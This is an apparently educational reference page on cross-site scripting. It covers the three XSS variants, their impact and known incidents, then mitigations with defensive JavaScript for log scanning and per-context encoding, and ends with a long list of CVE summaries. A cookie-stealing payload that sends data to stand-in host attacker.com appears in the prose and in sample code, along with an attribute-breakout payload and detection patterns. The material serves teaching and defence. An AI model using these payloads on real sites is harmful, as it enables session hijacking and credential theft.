Cross-Site Scripting
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
How It Works
The root cause is untrusted data reaching the browser without being encoded for the context it lands in. The attacker crafts input containing JavaScript, which the application incorporates into its HTML response. When a victim's browser renders that response, it executes the injected script as if it were legitimate code from the trusted site.
The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.
A typical attack flow starts with the attacker identifying an injection point: anywhere user input appears in HTML output. They craft a payload such as <script>document.location='http://attacker.com/steal?c='+document.cookie</script> (attacker.com standing in for a host the attacker controls) and inject it through the vulnerable parameter. When victims load the page, their browsers execute this script within the security context of the legitimate origin, giving the attacker access to the DOM, any data the page can fetch with the victim's session, and any cookies not flagged HttpOnly.
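To see the attack flow above from the defender's side, here is an added example (not code from the original page or from any vendor it names) that scans web-server access-log lines for reflected-XSS probes. It decodes the request target repeatedly and tolerates malformed percent sequences, so double-encoded payloads are not missed, then applies a handful of indicator patterns. The sample log lines, client addresses and payloads are constructed for the demo; line 1 carries the cookie-theft payload from the text.

```javascript
// Added example (not from the original page): flag reflected-XSS probes in
// access logs. Run with: node xss_log_scan.js

// Constructed sample lines in Apache/nginx "combined" format. Addresses are
// documentation space (203.0.113.0/24, 198.51.100.0/24); payloads are assumed.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET /search?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.com%2Fsteal%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [10/Oct/2024:13:55:41 +0000] "GET /search?q=%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [10/Oct/2024:13:56:02 +0000] "GET /search?q=javascript%20tutorial HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [10/Oct/2024:13:57:15 +0000] "GET /profile?name=test%22%20onmouseover%3D%22alert(1) HTTP/1.1" 200 731 "-" "curl/8.4.0"',
  '198.51.100.7 - - [10/Oct/2024:13:58:30 +0000] "GET /products?id=42&online=1 HTTP/1.1" 200 1500 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [10/Oct/2024:13:59:01 +0000] "GET /search?q=%zz%3Cscript%3Ealert(2)%3C/script%3E HTTP/1.1" 400 0 "-" "curl/8.4.0"',
];

// Indicator patterns applied to the *decoded* request target. The event-handler
// rule requires a quote or whitespace before "on..." so that ordinary
// parameters such as "online=1" do not fire it.
const INDICATORS = [
  { name: 'script-tag',     re: /<\s*script\b/i },
  { name: 'event-handler',  re: /["'\s]on[a-z]+\s*=/i },
  { name: 'javascript-uri', re: /javascript\s*:/i },
  { name: 'html-injection', re: /<\s*(img|svg|iframe|object|embed)\b/i },
  { name: 'cookie-access',  re: /document\.cookie/i },
];

// Tolerant percent-decoding: decodes every valid %XX pair and leaves malformed
// ones (such as "%zz") in place. decodeURIComponent would throw instead, and a
// deliberately broken sequence could then shield the rest of the payload.
function decodePercent(s) {
  return s.replace(/%([0-9a-f]{2})/gi, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Decode until the string stops changing (bounded), so double-encoded
// payloads (%253C -> %3C -> <) are exposed. '+' is a space in query strings.
function fullyDecode(s, maxRounds = 3) {
  let cur = s.replace(/\+/g, ' ');
  for (let i = 0; i < maxRounds; i++) {
    const next = decodePercent(cur);
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Pull the fields this check needs out of a combined-format line.
function parseLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: \S+)?" (\d{3})/);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Names of all indicators that fire on a decoded request target.
function classify(decodedTarget) {
  return INDICATORS.filter(({ re }) => re.test(decodedTarget)).map(({ name }) => name);
}

// Scan a batch of lines. Each hit keeps the source, the raw and decoded target
// and the rules that fired, which is what an analyst needs to triage it.
function scanLogLines(lines) {
  const hits = [];
  for (const line of lines) {
    const entry = parseLine(line);
    if (!entry) continue;
    const decoded = fullyDecode(entry.target);
    const indicators = classify(decoded);
    if (indicators.length > 0) hits.push({ ...entry, decoded, indicators });
  }
  return hits;
}

for (const hit of scanLogLines(SAMPLE_LOG)) {
  console.log(`${hit.ip} ${hit.method} ${hit.decoded}  [${hit.indicators.join(', ')}]`);
}
```

Hits are leads, not verdicts: the log shows what was sent, not whether the response reflected it unencoded, so confirm each one against the response body or a replay. Expect to tune the patterns against your own traffic; the benign "javascript tutorial" and "online=1" lines are there to show the kind of false positive a looser rule would produce.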
Impact
- Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
- Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
- Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
- Keylogging: Monitor and exfiltrate everything users type on the compromised page
- Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
- Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests
Real-World Examples
A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.
eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.
British Airways suffered a web-skimming (Magecart) attack in 2018 in which attackers modified a JavaScript library served from the airline's own site so that the payment page loaded card-skimming code. The script harvested payment details from roughly 380,000 transactions. Strictly this was script injection through a compromised first-party asset rather than an XSS bug in the application, but the browser-side result is the same as a stored XSS on the payment page, and it shows why a strict Content Security Policy matters even where input handling is sound.
Mitigation
- Context-aware output encoding: HTML-encode in HTML body and attribute context, JavaScript-encode inside JS string literals, URL-encode inside URL parameters. Apply the encoder for the context the data lands in; a single generic escaper (for example, backslash-escaping quotes) leaves other contexts open
- Content Security Policy (CSP): Deploy a strict CSP that allows scripts only by per-response nonce or hash (with 'strict-dynamic'), which blocks inline script and injected script tags. Domain allowlists are weaker, because any permitted origin that hosts a JSONP endpoint or an old library can be abused to run attacker script
- HttpOnly and Secure cookie flags: Prevent JavaScript from reading session cookies and ensure transmission over HTTPS only. This limits cookie theft but does not stop an injected script from sending requests in the victim's session, so it reduces impact rather than fixing the flaw
- Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
- DOM-based XSS prevention: Use safe APIs like textContent instead of innerHTML; avoid passing user data to dangerous sinks like eval(), document.write(), and string arguments to setTimeout(). Where user-supplied HTML must be rendered, sanitize it with a maintained library, and consider Trusted Types to make the browser enforce that policy at the sink
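As an added example of the first two mitigations (not code from the original page), here is one encoder per output context, the kind of generic quote-escaper the list warns against, and two checks that read the rendered HTML the way a browser's parser would. The page layout, the nonce value and the payloads are assumptions for the demo; a real nonce must come from a CSPRNG on every response.

```javascript
// Added example (not from the original page): context-aware encoders versus
// generic escaping, with parser-style checks. Run with: node xss_encoding.js

// HTML text and double-quoted attribute context: entity-encode the five
// characters that can change HTML structure.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: \xHH / \uHHHH-encode everything that is
// not alphanumeric. This also neutralises "</script>", which the HTML parser
// honours before the JS engine ever sees the string.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// URL query-parameter context. The output contains no & < > or " so it
// cannot terminate a double-quoted href attribute either.
function encodeForUrlParam(s) {
  return encodeURIComponent(String(s));
}

// The "generic escaping" the mitigation list warns against: backslash quotes
// and backslashes (addslashes-style) regardless of where the value lands.
function escapeQuotesGeneric(s) {
  return String(s).replace(/[\\'"]/g, (c) => '\\' + c);
}

// CSP that runs only scripts carrying this response's nonce. The nonce must be
// generated per response from a CSPRNG (e.g. 16 random bytes, base64-encoded).
function cspHeader(nonce) {
  return `script-src 'nonce-${nonce}' 'strict-dynamic'; object-src 'none'; base-uri 'none'`;
}

// A search page that reflects the query into three contexts: attribute value,
// JS string literal, URL parameter. Line 2 is always the script element.
function renderWithGenericEscaping(q) {
  const e = escapeQuotesGeneric(q);
  return `<input name="q" value="${e}">\n` +
         `<script>var last = '${e}';</script>\n` +
         `<a href="/search?q=${e}">again</a>`;
}

function renderHardened(q, nonce) {
  return `<input name="q" value="${encodeForHtml(q)}">\n` +
         `<script nonce="${nonce}">var last = '${encodeForJsString(q)}';</script>\n` +
         `<a href="/search?q=${encodeForUrlParam(q)}">again</a>`;
}

// Check 1: did the value attribute end early, leaving an on* handler as a
// separate attribute of the <input>? (A backslash is not an escape in HTML.)
function attributeBreakout(html) {
  const m = html.match(/<input name="q" value="([^"]*)"([^>]*)>/);
  return m !== null && /\son[a-z]+\s*=/i.test(m[2]);
}

// Check 2: is the script element's body still the single intended statement,
// or did the payload close the element or the string literal early?
function scriptBodyIntact(html) {
  const line = html.split('\n')[1];
  const bodyStart = line.indexOf('>') + 1;
  const end = line.indexOf('</script>', bodyStart);
  if (end < 0) return false;
  return /^var last = '(?:[^'\\]|\\.)*';$/.test(line.slice(bodyStart, end));
}

// Payload from the attack-flow description; "d3m0N0nce" is a placeholder.
const PAYLOAD = "<script>document.location='http://attacker.com/steal?c='+document.cookie</script>";
console.log(renderWithGenericEscaping('" onmouseover="alert(1)'));
console.log(renderHardened(PAYLOAD, 'd3m0N0nce'));
console.log('Content-Security-Policy: ' + cspHeader('d3m0N0nce'));
```

The generic escaper survives the textbook string breakout ';alert(1);// in the script context, which is exactly why it looks adequate in testing; it fails the attribute context (" onmouseover="alert(1) becomes a second attribute) and the </script> case (the HTML parser ends the element before the JS engine runs), while the per-context encoders pass both.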
Recent CVEs (9946)
Cross-site scripting (XSS) in Akaunting up to version 3.1.21 allows authenticated users to inject malicious scripts via the notes parameter in the Invoice/Billing component, potentially compromising other users' sessions when they view affected invoices. The vulnerability requires user interaction (UI:P) to trigger and has publicly available exploit code; however, vendor remediation response is unknown.
Cross-site scripting (XSS) in code-projects Simple Laundry System 1.0 allows remote attackers to inject malicious scripts via the userid parameter in /modstaffinfo.php, affecting the confidentiality and integrity of user sessions. The vulnerability requires user interaction (clicking a crafted link) and has a publicly available exploit (CVSS 4.3; the CVSS exploit-maturity metric E:P records proof-of-concept code, which is distinct from an EPSS probability). This is a stored or reflected XSS in a PHP-based application with a low CVSS score but non-negligible real-world risk given the ease of exploitation and public disclosure.
Stored or reflected cross-site scripting (XSS) in code-projects Simple Laundry System 1.0 allows remote attackers to inject malicious scripts via the userid parameter in /modmemberinfo.php, potentially compromising user sessions or stealing sensitive data. The vulnerability requires user interaction (UI:R) and publicly available exploit code exists, elevating the practical risk despite the moderate CVSS 4.3 score.
Stored cross-site scripting (XSS) in code-projects Simple Laundry System 1.0 allows unauthenticated remote attackers to inject malicious scripts via the firstName parameter in /modifymember.php, which are executed in the context of other users' browsers. The vulnerability has a CVSS score of 4.3 with low impact severity but publicly available exploit code, though exploitation requires user interaction (UI:R). This is a typical reflected or stored XSS in a parameter handler; the low score reflects limited direct impact and no availability impact, but the flaw still enables session hijacking and credential theft against users who view the payload.
Cross-site scripting (XSS) in badlogic pi-mono 0.58.4 SVG Artifact Handler allows unauthenticated remote attackers to inject malicious scripts via the SvgArtifact.ts component, affecting application integrity when users interact with crafted SVG artifacts. Publicly available exploit code exists, and the vendor has not responded to disclosure despite early notification.
Stored Cross-Site Scripting in Visitor Traffic Real Time Statistics WordPress plugin (≤8.4) allows unauthenticated remote attackers to inject malicious JavaScript via the 'page_title' parameter that executes when administrators view the Traffic by Title section. No public exploit identified at time of analysis, though CVSS 7.2 (High) severity reflects the unauthenticated attack vector and changed scope. Upstream fix available (PR/commit); released patched version not independently confirmed based on provided Trac changeset reference.
Stored cross-site scripting (XSS) in WPFunnels - Easy Funnel Builder plugin for WordPress versions up to 3.7.9 allows authenticated contributors and higher-privileged users to inject arbitrary JavaScript via the 'button_icon' parameter in the 'wpf_optin_form' shortcode due to insufficient input sanitization and output escaping. The injected scripts execute in the context of any user viewing the affected page, potentially compromising website visitors and enabling session hijacking, credential theft, or malware distribution. This vulnerability requires authenticated attacker access but affects all site visitors who view injected pages.
Stored Cross-Site Scripting in WP Travel Engine plugin versions up to 6.7.5 allows authenticated contributors and above to inject malicious scripts via the 'wte_trip_tax' shortcode due to insufficient input sanitization and output escaping. When site visitors access pages containing the injected payload, the arbitrary JavaScript executes in their browsers, enabling session hijacking, credential theft, or malware distribution. No public exploit code or active exploitation has been identified at time of analysis.
Stored cross-site scripting (XSS) in the Widgets for Social Photo Feed WordPress plugin (versions ≤1.7.9) allows unauthenticated remote attackers to inject malicious scripts via unsanitized 'feed_data' parameter keys, achieving persistent code execution in victim browsers with scope change impact. The vulnerability stems from insufficient input validation on widget configuration data. CVSS 7.2 reflects network-accessible, low-complexity exploitation requiring no privileges or user interaction, with changed scope enabling attacks beyond the vulnerable component. Patch released in version 1.8 per WordPress.org changeset references. No confirmed active exploitation (not in CISA KEV) or public proof-of-concept identified at time of analysis, though the technical simplicity and unauthenticated attack vector present moderate real-world risk for sites using affected versions.
Stored Cross-Site Scripting in Xpro Addons - 140+ Widgets for Elementor plugin up to version 1.4.20 allows authenticated contributors and above to inject malicious scripts via the Pricing Widget's 'onClick Event' setting, which execute in the browsers of any user viewing the affected pages. The vulnerability stems from insufficient input sanitization and output escaping, enabling persistent XSS attacks that compromise site integrity and user sessions. No active exploitation has been confirmed, but the low attack complexity and contributor-level access requirement present a moderate real-world risk for WordPress sites with contributor user bases.
Stored Cross-Site Scripting (XSS) in Simple Shopping Cart WordPress plugin versions up to 5.2.4 allows authenticated contributors and above to inject arbitrary JavaScript via the 'wpsc_display_product' shortcode attributes due to insufficient input sanitization and output escaping. Injected scripts execute in the browsers of all users viewing affected pages. No public exploit code or active exploitation has been reported at time of analysis.
Stored Cross-Site Scripting (XSS) in WP Shortcodes Plugin - Shortcodes Ultimate up to version 7.4.7 allows authenticated contributors and above to inject arbitrary JavaScript via the 'src' attribute of the su_lightbox shortcode, which executes in the browsers of all users viewing the affected page. The vulnerability stems from insufficient input sanitization and output escaping, requiring only contributor-level access to exploit. No public exploit code or active exploitation has been confirmed at time of analysis.
Stored Cross-Site Scripting in WP Shortcodes Plugin - Shortcodes Ultimate up to version 7.4.8 allows authenticated attackers with author-level permissions to inject arbitrary JavaScript into pages via the su_carousel shortcode's 'su_slide_link' attachment meta field. The vulnerability stems from insufficient input sanitization and output escaping, enabling malicious scripts to execute when any user visits an affected page. No public exploit code or active exploitation has been identified at the time of analysis.
Stored Cross-Site Scripting in ElementsKit Elementor Addons and Templates plugin (versions up to 3.7.9) allows authenticated contributors and above to inject malicious scripts via the 'ekit_tab_title' parameter in the Simple Tab widget due to insufficient input sanitization and output escaping. Injected scripts execute when users access affected pages. No public exploit code or active exploitation has been identified at time of analysis.
Stored Cross-Site Scripting (XSS) in Royal Addons for Elementor plugin allows authenticated contributors and above to inject arbitrary JavaScript via the 'button_text' parameter, affecting all versions through 1.7.1049. The vulnerability stems from insufficient input sanitization and output escaping, enabling attackers to execute malicious scripts in the context of any user visiting an affected page. No public exploit code or active exploitation has been identified at time of analysis.
Stored cross-site scripting in Ultimate Member plugin versions up to 2.11.1 allows authenticated subscribers and above to inject arbitrary JavaScript via the user description field when HTML support is enabled, executing malicious scripts in pages viewed by other users. The vulnerability requires prior authentication and user interaction but affects site visitors broadly once injected. Wordfence reported the issue; a fix is available in patched versions.
Stored Cross-Site Scripting (XSS) in Xpro Addons - 140+ Widgets for Elementor plugin for WordPress up to version 1.4.24 allows authenticated contributors and above to inject malicious scripts via the Icon Box widget that execute for all users viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping, making it a direct code injection risk in a widely-used page builder extension. CVSS 6.4 reflects moderate severity with limited direct impact (confidentiality and integrity) but cross-site scope; no public exploit code or active exploitation has been identified at time of analysis.
Stored Cross-Site Scripting in Gutenverse - Ultimate WordPress FSE Blocks Addons & Ecosystem plugin versions up to 3.4.6 allows authenticated attackers with contributor-level access or higher to inject arbitrary JavaScript via the 'imageLoad' parameter, resulting in persistent script execution in pages viewed by other users. CVSS 6.4 reflects medium severity with cross-site scope; no public exploit code or active exploitation has been identified at the time of analysis, but the vulnerability requires only low privileges and no user interaction beyond initial page access.
Cross-site scripting (XSS) vulnerability in Hugo's default markdown-to-HTML renderer: links and image links were not properly escaped, allowing injection of malicious scripts through markdown content. Hugo releases before the fixed version are affected. Users who employ custom render hooks for links and images, or who trust all markdown content sources, are not vulnerable. Vendor-released patch: v0.159.2.
Stored cross-site scripting (XSS) in Emlog's comment module allows unauthenticated remote attackers to inject malicious scripts via URI scheme validation bypass, affecting all versions prior to 2.6.8. The vulnerability requires user interaction (clicking a malicious link) and can result in session hijacking, credential theft, or malware distribution to website visitors. No public exploit code or active exploitation has been confirmed at time of analysis.
Stored cross-site scripting (XSS) in Budibase's Builder Command Palette (versions prior to 3.32.5) enables authenticated Builder users to inject malicious HTML payloads via entity names (tables, views, queries, automations), achieving session hijacking and account takeover when other Builder-role users invoke the Command Palette. CVSS 8.7 with changed scope reflects the cross-user attack vector. No public exploit identified at time of analysis, though the attack technique is straightforward for authenticated insiders. EPSS data unavailable; patch available in version 3.32.5.
Stored cross-site scripting (XSS) in Casdoor 2.356.0 via React's dangerouslySetInnerHTML prop allows authenticated remote attackers to inject malicious scripts through the formCss, formCssMobile, or formSideHtml parameters. An attacker with authenticated access can craft payloads that execute arbitrary JavaScript in the context of other users' browsers when they view affected forms. Publicly available exploit code exists for this vulnerability, and the vendor has not responded to early disclosure attempts, indicating no coordinated patch timeline.
Stored cross-site scripting in Zohocorp ManageEngine Exchange Reporter Plus (pre-5802) allows authenticated attackers to inject malicious scripts via the Permissions Based on Mailboxes report, potentially compromising administrator sessions and stealing high-privilege credentials. Attack requires low complexity and user interaction from a victim administrator. CVSS 7.3 (High) reflects significant confidentiality and integrity impact. No public exploit identified at time of analysis, with EPSS data unavailable for this recently disclosed vulnerability.
Stored cross-site scripting (XSS) in Zohocorp ManageEngine Exchange Reporter Plus versions prior to 5802 allows authenticated attackers to inject malicious scripts through the Non-Owner Mailbox Permission report, potentially compromising confidentiality and integrity of user sessions. With CVSS 7.3 (High) and EPSS data unavailable, exploitation requires low attack complexity and authenticated access with user interaction. No public exploit identified at time of analysis, and vendor has released patched version 5802.
Stored cross-site scripting in ManageEngine Exchange Reporter Plus before version 5802 allows authenticated attackers to inject malicious scripts via the Folder Message Count and Size report. With CVSS 7.3 (High severity) and requiring low-privilege authentication with user interaction, successful exploitation enables session hijacking and credential theft within the administrative interface. No public exploit identified at time of analysis, though CVSS vector indicates network-accessible attack surface with low complexity.
Stored cross-site scripting in ManageEngine Exchange Reporter Plus (versions prior to 5802) allows authenticated attackers to inject malicious scripts through the Public Folder Client Permissions report, enabling session hijacking and credential theft with medium exploitation complexity. No active exploitation confirmed (not present in CISA KEV), though the network-accessible attack vector and stored nature of the XSS elevate real-world risk for organizations using this Exchange monitoring solution.
Stored cross-site scripting in ManageEngine Exchange Reporter Plus (versions prior to 5802) allows authenticated attackers with low privileges to inject malicious scripts into Equipment Mailbox Details reports, enabling session hijacking and credential theft against administrative users who view the poisoned reports. No active exploitation confirmed (not in CISA KEV), but the vulnerability affects organizations monitoring Microsoft Exchange environments through ManageEngine's reporting platform.
Stored cross-site scripting (XSS) in ManageEngine Exchange Reporter Plus before version 5802 allows authenticated attackers to inject malicious scripts into the 'Mails Exchanged Between Users' report. With CVSS 7.3 (High severity) and low attack complexity (AC:L), this vulnerability requires low-privilege authentication (PR:L) and user interaction (UI:R) to achieve high confidentiality and integrity impact. No public exploit identified at time of analysis; the authentication requirement is easily met by insiders or by compromised low-privilege accounts.
Stored cross-site scripting (XSS) in ManageEngine Exchange Reporter Plus before version 5802 allows authenticated attackers with low privileges to inject malicious scripts into the Permissions based on Distribution Groups report, potentially leading to session hijacking and account compromise of administrators viewing the report. No active exploitation confirmed (not in CISA KEV), but the network-accessible attack vector, low complexity, and publicly documented vendor advisory make exploitation straightforward.
Stored cross-site scripting (XSS) in ManageEngine Exchange Reporter Plus versions prior to 5802 allows authenticated attackers with low privileges to inject malicious scripts into Distribution Lists reports that execute when viewed by other users, potentially compromising session tokens and account credentials of administrators or other privileged users. The vulnerability requires user interaction (victim must view the malicious report) but enables high-impact attacks against confidentiality and integrity within the application scope. No public exploit code or active exploitation has been identified at time of analysis.
Stored cross-site scripting (XSS) in ci4-cms-erp/ci4ms profile management enables privilege escalation to full administrative compromise. Attackers inject malicious JavaScript payloads through unsanitized profile name fields, which execute persistently across multiple application interfaces including administrative user management pages and public-facing blog views. When administrators access affected pages, the stored payload executes in their browser context, enabling session hijacking and complete account takeover. Vendor patch available per GitHub security advisory. This represents a critical privilege escalation vector requiring immediate remediation in any deployment with multiple user roles.
Remote code execution in D-Tale allows unauthenticated attackers to execute arbitrary code on servers hosting D-Tale publicly when using Redis or Shelf storage backends. The vulnerability stems from improper input validation in the storage layer, affecting D-Tale versions prior to 3.22.0. Vendor-released patch version 3.22.0 is available.
Cross-site scripting (XSS) in Roundcube Webmail before versions 1.5.14 and 1.6.14 allows remote attackers to inject malicious scripts via insufficient HTML sanitization in text/html attachment preview mode. An authenticated user must preview a malicious text/html attachment to trigger the vulnerability, enabling attackers to steal session cookies, redirect users, or perform actions on behalf of the victim. No public exploit code or active exploitation has been confirmed; the 6.1 score (a CVSS base score; EPSS values are probabilities between 0 and 1) reflects moderate real-world risk given the user interaction requirement.
Context isolation bypass in Electron applications enables privilege escalation when VideoFrame objects are bridged to the main world. Attackers with XSS capabilities can leverage improperly bridged WebCodecs API VideoFrame objects to escape the isolated context and access Node.js APIs exposed in preload scripts. CVSS 8.4 (High) with network attack vector requiring high complexity and user interaction. No public exploit identified at time of analysis, though proof-of-concept development is feasible given the detailed vendor disclosure.
Cross-site scripting (XSS) in Shynet before version 0.14.0 allows unauthenticated remote attackers to inject arbitrary scripts through the urldisplay and iconify template filters, potentially compromising user sessions and data integrity with medium attack complexity and cross-site scope. The vulnerability affects the analytics platform's template rendering layer and has been patched in version 0.14.0 with no confirmed active exploitation reported.
Cross-site scripting (XSS) vulnerability in CERT/CC cveClient cveInterface.js prior to version 1.0.24 allows injection of arbitrary HTML through untrusted CVE API service input. The vulnerability stems from insufficient input validation, enabling attackers to inject malicious scripts that execute in the context of users viewing CVE data. No CVSS score or exploitation data is available, limiting quantitative risk assessment; however, the attack vector is network-based and requires no authentication.
Stored cross-site scripting (XSS) in Hoppscotch prior to version 2026.3.0 allows authenticated users to inject malicious scripts via the team member display name field, which executes when other users view the overflow tooltip. The vulnerability requires user interaction (viewing the tooltip) and affects the confidentiality and integrity of affected sessions with a CVSS score of 5.4. No public exploit code or active exploitation has been identified at time of analysis.
Stored cross-site scripting (XSS) in Hoppscotch versions prior to 2026.3.0 enables remote attackers to execute arbitrary JavaScript in victim browsers without authentication, potentially escalating to cross-site request forgery (CSRF) attacks against authenticated users. CVSS 8.5 (High) reflects network accessibility with low complexity but user interaction required. No public exploit identified at time of analysis, though the attack surface is well-understood for stored XSS vectors in API development tools where malicious payloads persist in shared workspaces or collections.
Arbitrary code execution in AWS Kiro IDE versions prior to 0.8.140 occurs when a local user opens a maliciously crafted workspace containing an unsanitized color theme name, exploiting improper neutralization of input during webview generation. The attack requires user interaction (trusting the workspace when prompted) and can deliver full system compromise with high confidentiality, integrity, and availability impact. No public exploit identified at time of analysis, though SSVC framework rates technical impact as total with manual (non-automatable) exploitation potential.
Stored cross-site scripting (XSS) in Frappe Learning Management System versions 2.27.0 through 2.47.x allows unauthenticated remote attackers to inject and persist malicious scripts that execute in the browsers of other users. The vulnerability affects content structure functionality and has been patched in version 2.48.0. No public exploit code or active exploitation has been confirmed at time of analysis.
Stored cross-site scripting (XSS) in Krayin Laravel-CRM up to version 2.2 allows authenticated users with low privileges to inject malicious scripts via the composeMail function in the Activities/Notes Module, which are then executed when other users view the content. The vulnerability requires user interaction (UI:P) but has confirmed publicly available exploit code and a vendor-released patch (commit 73ed28d466bf14787fdb86a120c656a4af270153), making it a moderate priority for deployments where multiple users interact with notes and mail features.
Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the remark parameter in the /manage/password/web/ endpoint. The injected payload is persistently stored and executes when other authenticated users access the affected page, enabling session hijacking, credential theft, or lateral movement within the firewall management interface. No public exploit code or active exploitation has been confirmed at the time of analysis.
Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and earlier allows authenticated attackers to inject arbitrary JavaScript via the new_cert_name parameter in the /manage/ca/certificate/ endpoint. The injected payload is stored and executed when other users access the affected page, enabling session hijacking, credential theft, or malware distribution within the firewall management interface. No public exploit code or active exploitation has been confirmed at the time of this analysis.
Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the remark parameter in the VPN authentication user management interface (/manage/vpnauthentication/user/). The injected payload persists in the database and executes when other authenticated users access the affected page, enabling session hijacking, credential theft, or privilege escalation and lateral movement within the firewall management console.
Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject malicious JavaScript via the remark parameter in the IPSec management interface (/manage/ipsec/), which persists and executes when other users access the affected page. This requires user interaction (page view) and only affects session integrity and information disclosure within the administrative interface. No public exploit code or active exploitation has been confirmed at the time of analysis.
Stored cross-site scripting in Endian Firewall 3.3.25 and earlier allows authenticated attackers to inject arbitrary JavaScript via the REMARK parameter in /cgi-bin/openvpnclient.cgi, with the payload persisted and executed when other users access the affected page. CVSS 5.1 reflects low immediate impact due to user interaction requirement and limited scope, but the stored nature increases attack persistence; no public exploit code or CISA KEV confirmation identified at time of analysis.
Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject malicious JavaScript via the remark parameter in the DNS local domains management interface (/manage/dnsmasq/localdomains/). The injected payload persists in the application and executes when other authenticated users access the affected page, enabling session hijacking, credential theft, or malware distribution within the firewall management environment. No public exploit code or active exploitation has been reported.
Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the ADDRESS BCC parameter in /cgi-bin/smtprouting.cgi, with the payload executed when other users view the affected page. The vulnerability requires user interaction (UI:P) and authenticated access (PR:L), limiting real-world impact to internal threat actors with valid credentials, though successful exploitation could compromise session integrity and user data within the firewall management interface.
Stored cross-site scripting in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the domain parameter in the /manage/smtpscan/domainrouting/ endpoint, with execution when other authenticated users view the page. The vulnerability requires user interaction (page view) and authenticated access, resulting in a CVSS score of 5.1 with scope change and integrity impact to other users' sessions. No public exploit code or active exploitation has been identified at time of analysis.
Stored cross-site scripting in Endian Firewall versions 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the DOMAIN parameter in /cgi-bin/smtpdomains.cgi, which is executed when other users view the affected page. The vulnerability requires user interaction and authenticated access but can impact session security and administrative controls. No public exploit code or active exploitation has been identified at time of analysis.
Stored cross-site scripting in Endian Firewall version 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the group parameter in /cgi-bin/proxygroup.cgi, with the malicious payload persisting and executing when other users access the affected page. CVSS score of 5.1 reflects moderate severity with limited scope of impact; exploitation requires prior authentication and user interaction but can affect confidentiality and integrity within the application context. No public exploit code or active exploitation has been confirmed at the time of analysis.
Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the user parameter in /cgi-bin/proxyuser.cgi, which is then executed when other users view the affected page. This requires user interaction (page view) but enables session hijacking, credential theft, or administrative action abuse within the firewall's web interface. No public exploit code or active exploitation has been confirmed at time of analysis.
Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the mimetypes parameter in /cgi-bin/proxypolicy.cgi, which is executed when other users access the affected page. CVSS 5.1 reflects moderate impact; exploitation requires prior authentication and user interaction, limiting real-world severity despite the persistent nature of stored XSS. No public exploit code or active exploitation has been identified at time of analysis.
Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and prior allows authenticated attackers to inject arbitrary JavaScript via the remark parameter in /cgi-bin/xtaccess.cgi, which is executed when other users view the affected page. The vulnerability requires valid user credentials and user interaction but can compromise session tokens and sensitive data of administrators and other firewall users. No public exploit code or active exploitation has been confirmed at this time.
Stored cross-site scripting (XSS) in Endian Firewall 3.3.25 and earlier allows authenticated attackers to inject arbitrary JavaScript via the remark parameter in /cgi-bin/vpnfw.cgi, which persists and executes when other users access the affected page. CVSS 5.1 reflects low immediate confidentiality/integrity impact and the user interaction requirement; the vulnerability requires authenticated access (PR:L), limiting the blast radius compared to unauthenticated XSS.
